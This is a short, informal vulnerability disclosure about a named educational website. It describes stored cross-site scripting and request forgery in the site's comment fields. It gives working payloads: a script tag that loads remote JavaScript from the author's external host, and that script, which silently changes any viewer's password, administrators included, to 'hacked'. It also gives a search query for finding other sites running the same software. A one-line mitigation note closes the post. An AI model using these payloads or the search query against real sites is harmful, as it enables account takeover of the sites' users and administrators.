http://www.csice.org/
Suffers from XSS and CSRF cross site scripting and cross site request
forgery attacks.
The vulnerability lies in the Post comment  filelds in the following page
move to this page 'only for authenticated user'
http://www.csice.org/student/subjects.html

and choose a subject and
http://www.csice.org/student/LessonPosting/59/0/view_units.html

here users are allowed to post comments there,but the comments r not
filtered possibly allowing any one to inject scripts too

like we could update a post with a comment like
<script>alert('Hacked by FB1H2S')</script>

which ill get updated on the DATABASE and the next time when some one
views the page tht page ill alert with javascript alert statnment.

This attack could be taken to another extend,now tht we could run
javascripts on client side we may build a java script, which when runs
ill change the user password to a new value, all we have to do is
update the code in the comment field and when some other user views
the page the script for change password ill get executed and ,his or
her password ill be changed.

Consider for example :
post comment with this
<SCRIPT SRC="http://fb1h2s.byethost15.com/sas.js"></SCRIPT>

wht sas.js do is change the user password to 'hacked' when run on the victim,

var pass_req = createAjaxObject();
var data = 'hacked';
alert(data);
pass_req.open("post","http://www.csice.org/student/ajax_redirect.php?page=student&option=change_password");
pass_req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
pass_req.send("data="+data);

So using this hack we could hack change any users/administrtors
password to a new value

I am not able to figure out what CMS this site runs on, but it surel is an open source CMS, see the inurl:ajax_redirect.php?page=
you could see a lot of results


Filtering the input Will be the way to prevent these issues, have a look at
our website and this paper on how to prevent such attacks
http://www.whitec0de.com/paper/0121

love FB1H2S
hcking is matter of time knowldge and patience